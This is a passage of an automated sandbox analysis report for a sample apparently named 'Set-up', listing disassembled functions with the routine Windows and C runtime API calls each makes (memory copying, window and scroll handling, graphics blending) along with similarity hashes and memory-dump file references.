Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$CreateDeleteSelect$AlphaBlendCompatibleSection
String ID:
API String ID: 685221683-0
Opcode ID: e743b8f8e1981ae034a702e2bd25fdc310aeff71df76d5e37f3ba24ce8c64632
Instruction ID: d679ba52b53ffaa2156f1119a60896d9b0a2897c11ec208de035e801c778c249
Opcode Fuzzy Hash: e743b8f8e1981ae034a702e2bd25fdc310aeff71df76d5e37f3ba24ce8c64632
Instruction Fuzzy Hash: FB8169B2A08312DFCB04CF19D985A2EBBE5EFC4701F41491DF8D5A7694C630D969CBA2

Function 00A71720 Relevance: 6.2, APIs: 4, Instructions: 214COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A717A1

Part of subcall function 00BFDF75: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF7D
Part of subcall function 00BFDF75: _CxxThrowException.VCRUNTIME140(?,00C4E6BC), ref: 00BFEB61
Part of subcall function 00BFDF75: _CxxThrowException.VCRUNTIME140(?,00C4E6F4), ref: 00BFEB7E
Part of subcall function 00BFDF75: IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 00BFEB9D

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00A71877
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000014,00000000,00000000,?,?), ref: 00A718E7

Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A

memset.VCRUNTIME140 ref: 00A71949

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWidememset$FeaturePresentProcessor_callnewhmalloc
String ID:
API String ID: 2227810024-0
Opcode ID: b8b75750dd25ede4eb93d4ff19e2438123812101dcd72884c89a120aab758b20
Instruction ID: fce24cf84b6f16096aba16019eacc15178ca12b90b462e8c007e9d751c5ed276
Opcode Fuzzy Hash: b8b75750dd25ede4eb93d4ff19e2438123812101dcd72884c89a120aab758b20
Instruction Fuzzy Hash: 5E81F670A003099BDB25CF68C851BEEBBF5EF05700F24C56DE59AAB381DB70A945CB90

Function 00AC9DC0 Relevance: 6.2, APIs: 4, Instructions: 190COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,?,?), ref: 00AC9E74
memset.VCRUNTIME140 ref: 00AC9E85
DestroyWindow.USER32(00000000), ref: 00AC9F4B

Part of subcall function 00AC9B80: memset.VCRUNTIME140 ref: 00AC9B9C
Part of subcall function 00AC9B80: DestroyWindow.USER32(00000000), ref: 00AC9BEE

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Window$Destroymemset$Show
String ID:
API String ID: 1325792147-0
Opcode ID: f9f4bdaa7974b3bf3ad620b078f7086dd8dbcd1ed97f08581d42d31f05af76e1
Instruction ID: e019b84da027fc2ede6327eed778dd28adf4b40692299487ee97b25b6a18e015
Opcode Fuzzy Hash: f9f4bdaa7974b3bf3ad620b078f7086dd8dbcd1ed97f08581d42d31f05af76e1
Instruction Fuzzy Hash: 14817EB1A002189FDF14DF28C988BAE77B6EB44304F0541FDE919AB291DB75AE84CF54

Function 00AD15A0 Relevance: 6.2, APIs: 4, Instructions: 189COMMON

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,000000FF,?,?), ref: 00AD160A
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00AD1647
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 00AD168A
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00AD16C7

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: atol
String ID:
API String ID: 1464325613-0
Opcode ID: 41bf32dd28b5c52930db622a460ca246e91e9ae679d52a864e383ace88635e43
Instruction ID: fe8be1017afa48c3f46d70c464eb5cbdbab9fb7a6b248ffa903424555818c6a9
Opcode Fuzzy Hash: 41bf32dd28b5c52930db622a460ca246e91e9ae679d52a864e383ace88635e43
Instruction Fuzzy Hash: 4861F4759042456FDB258F58C8C07E8BBA2EF56340F5C81A6D89B4B356D331E8C3CBA1

Function 00A6B3F0 Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A6B4D2
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B4ED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B559
memset.VCRUNTIME140 ref: 00A6B574

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: f8a14b09656c23d0e898b2ca84562ec4352f516c5a70fe2413a2bd27e3f5ae33
Instruction ID: 7055b8c64baf06e2deeff344477614a797917e6acc7c1ae27b6312e23d2fc173
Opcode Fuzzy Hash: f8a14b09656c23d0e898b2ca84562ec4352f516c5a70fe2413a2bd27e3f5ae33
Instruction Fuzzy Hash: 5F511AB3A100149BCB14DF6CCC85ABDB7B5EF94310B18826AE916DB385EB70ED55C7A0

Function 00A8E100 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A8E1BE
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,00A8AD4A,?,?), ref: 00A8E1D9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00A8AD4A,?,?), ref: 00A8E22C
memset.VCRUNTIME140 ref: 00A8E245

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: 813baaef719c56af58618b8ae6de0e6c48bc41ea3ff3d57fdec340fb47963a66
Instruction ID: 9e992794f55060bc07f9ee44497881f7e076d8c1f914e4914a07e7138e653fc2
Opcode Fuzzy Hash: 813baaef719c56af58618b8ae6de0e6c48bc41ea3ff3d57fdec340fb47963a66
Instruction Fuzzy Hash: 2441E5B2A001059BDB14EF78DC85ABDB3A9EB54360F544339E92AC3694F730E964C790

Function 00A63F40 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

AlphaBlend.MSIMG32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 00A640B0
SelectObject.GDI32(?,?), ref: 00A640C0
DeleteObject.GDI32(?), ref: 00A640CB
DeleteDC.GDI32(?), ref: 00A640D6

Part of subcall function 00A62540: floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A62552

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: DeleteObject$AlphaBlendSelectfloor
String ID:
API String ID: 2194882061-0
Opcode ID: 741745d382a0a223a78777ab60400dd3ffc833d667bca47861e8ddc31a215c9c
Instruction ID: 91ea9179dfe0f917b2525715fe26fa5749de0da38a2c36252d5900de912db467
Opcode Fuzzy Hash: 741745d382a0a223a78777ab60400dd3ffc833d667bca47861e8ddc31a215c9c
Instruction Fuzzy Hash: D2519F72A04206EBCB01AF40D9486AF7FB4FF84740F524948F9D5621A5E731C9358F96

Function 00A62320 Relevance: 6.2, APIs: 4, Instructions: 153COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00000001), ref: 00A623EE
memcpy.VCRUNTIME140(00000000,?,?,00000001), ref: 00A62408
memcpy.VCRUNTIME140(?,?,00000000), ref: 00A6242B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A62485

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2665656946-0
Opcode ID: ed74b8608736d8a38c40a9d5de351f46622401671aa81497a64ab55888d6302c
Instruction ID: a53ae65bcab8edca852ddd24836c70d7311cb697168f641be82c14d7a8349fb0
Opcode Fuzzy Hash: ed74b8608736d8a38c40a9d5de351f46622401671aa81497a64ab55888d6302c
Instruction Fuzzy Hash: 3541C371A00906AFC708DF68CD85A6DB7B5EF44350B148328F926CB395EB34EE55C790

Function 00A70FF0 Relevance: 6.2, APIs: 4, Instructions: 153COMMON

Download Yara Rule

APIs

GetScrollInfo.USER32(?,00000001,?), ref: 00A71048
SetScrollInfo.USER32(?,00000001,0000001C,00000001), ref: 00A710A6
GetScrollInfo.USER32(?,00000000,0000001C), ref: 00A71136
SetScrollInfo.USER32(?,00000000,0000001C,00000001), ref: 00A71189

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: f8f94cc85932f63c7ff8da4813df0708989f253b8704cd51bfbbc6ee7e7c428f
Instruction ID: 48ac2ee09017d54ed2f39e2dce8e0efa2d38736727eb0b7db1d1c2d0289fb8ad
Opcode Fuzzy Hash: f8f94cc85932f63c7ff8da4813df0708989f253b8704cd51bfbbc6ee7e7c428f
Instruction Fuzzy Hash: 2E612370900209DFDB20CFA8C848BEEBBF4BF48315F14851DE45AAA284C7B56A94CF91

Function 00AC5EC0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00AC5F78
memcpy.VCRUNTIME140(00000000,?,?,00000000,FFFFFFFF,?,?), ref: 00AC5F92
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,FFFFFFFF,?,?), ref: 00AC5FE5
memset.VCRUNTIME140 ref: 00AC5FF8

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: 6686b2b44c51bbfc68fb5c1abcbb72ce965e0dbcf7d05e10a119887095b85f7d
Instruction ID: be8cdd095d037ce3d41bd702a4fd13862c5a332589b8c3786476260cbbe0f2e6
Opcode Fuzzy Hash: 6686b2b44c51bbfc68fb5c1abcbb72ce965e0dbcf7d05e10a119887095b85f7d
Instruction Fuzzy Hash: 2F411772A005145BCB18DF7CDC85F7DB798EF84360B19836EF925CB285E630E95486D1

Function 00A6B270 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00A632E3,?,?,75296BA0,00A632E3,?,?), ref: 00A6B345
memcpy.VCRUNTIME140(00000000,?,?,00A632E3,?,?,75296BA0,00A632E3,?,?), ref: 00A6B35F
memcpy.VCRUNTIME140(?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B382
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B3DC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2665656946-0
Opcode ID: 03fa90e63acd12be4132831613a558fb9419006c53f54aadef42b05608982313
Instruction ID: 1c68bc13cc89398d8e359823de0d15371812c45bd617a7d9c3d9f415c0178d61
Opcode Fuzzy Hash: 03fa90e63acd12be4132831613a558fb9419006c53f54aadef42b05608982313
Instruction Fuzzy Hash: A741C5B1A10505AFC704DF38CD949ADB7B9EF44354B148328E829CB795EB30EE94CBA0

Function 00A74A90 Relevance: 6.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A74B41
memcpy.VCRUNTIME140(00000000,?,?,?), ref: 00A74B5B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A74BAE
memset.VCRUNTIME140 ref: 00A74BC0

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: a9a42b05967b53e54325c6ef47b3a6535e4045b9cc7340724da20264335a1a97
Instruction ID: cd41590b9b5950eaf5fde6dc048af3c402a4e12f5dbaff1f8579ced7228b96a9
Opcode Fuzzy Hash: a9a42b05967b53e54325c6ef47b3a6535e4045b9cc7340724da20264335a1a97
Instruction Fuzzy Hash: 6441F8726000149BC718DF7CDC85A7DB7A9EFC8360B18C369E929CB2D9EB30DD548691

Function 00AD1FE0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00AD2082
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00AD209E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?), ref: 00AD20EF
memset.VCRUNTIME140 ref: 00AD2103

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: 512d62dbf295bbe0e18b55b511b78f78f93be6ad8852734fdd479b94762556d4
Instruction ID: 310146285e5807aaa31bd5ef7fae1427b765f1dd1c50f23814fa4bb825333312
Opcode Fuzzy Hash: 512d62dbf295bbe0e18b55b511b78f78f93be6ad8852734fdd479b94762556d4
Instruction Fuzzy Hash: 3B41D772A000049BCB14DF7CDD85A7DB7A9EF94310B28837AE91ACB385EA31DD45C7A1

Function 00A7CA40 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,00000000,00000000,?,00A7BFF5,00A7C530,?,00A7C530), ref: 00A7CADD
memset.VCRUNTIME140 ref: 00A7CB04
memcpy.VCRUNTIME140(00000000,?,?,00000000,00000004,00000000,00000000,?,00A7BFF5,00A7C530,?,00A7C530), ref: 00A7CB21
memset.VCRUNTIME140 ref: 00A7CB4B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: b236b5db22b2fcd45ca2e9720bf0de0d58c298a24bc972247de6731d48f5a39a
Instruction ID: 465c88a6873a3e0552345e7c3292910424a0ee3b2fd5f33f40b4bd9b4d604885
Opcode Fuzzy Hash: b236b5db22b2fcd45ca2e9720bf0de0d58c298a24bc972247de6731d48f5a39a
Instruction Fuzzy Hash: 8931D6B2A00119ABC714DFBD9D8197EB7A9EB84371B10C37EE929D3294EA709D148690

Function 00A7C920 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A7C99A
memset.VCRUNTIME140 ref: 00A7C9C1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 00A7C9E1
memset.VCRUNTIME140 ref: 00A7CA0B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
